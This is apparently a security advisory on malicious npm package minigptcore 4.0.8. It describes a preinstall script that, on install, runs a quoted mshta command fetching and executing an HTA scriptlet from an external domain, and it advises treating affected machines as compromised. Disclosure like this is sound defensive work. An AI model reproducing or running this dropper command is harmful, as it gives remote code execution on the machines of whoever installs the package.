VYPR

npm · Malicious package advisory

Malware

minigptcore

MAL-2026-10417

Malicious code in minigptcore (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8be3fb8ddeae3078f0765ce77f9a329caacd7ee5741b2c96dcf8f613f5444ba0)
On `npm install`, the package's preinstall script (preinstall.js) invokes `cmd /c mshta http://fixars.top/...`, causing Windows mshta.exe to fetch and execute an HTA scriptlet from a hardcoded external domain over plain HTTP. The fetched content is unpinned, unverified, and unrelated to any documented package purpose, and executes with the privileges of the user running `npm install`. package.json ships placeholder metadata (empty author, empty keywords, generic description) consistent with a throwaway upload whose only functional effect is the remote-code-execution dropper.

Compromised versions (1)

  • 4.0.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.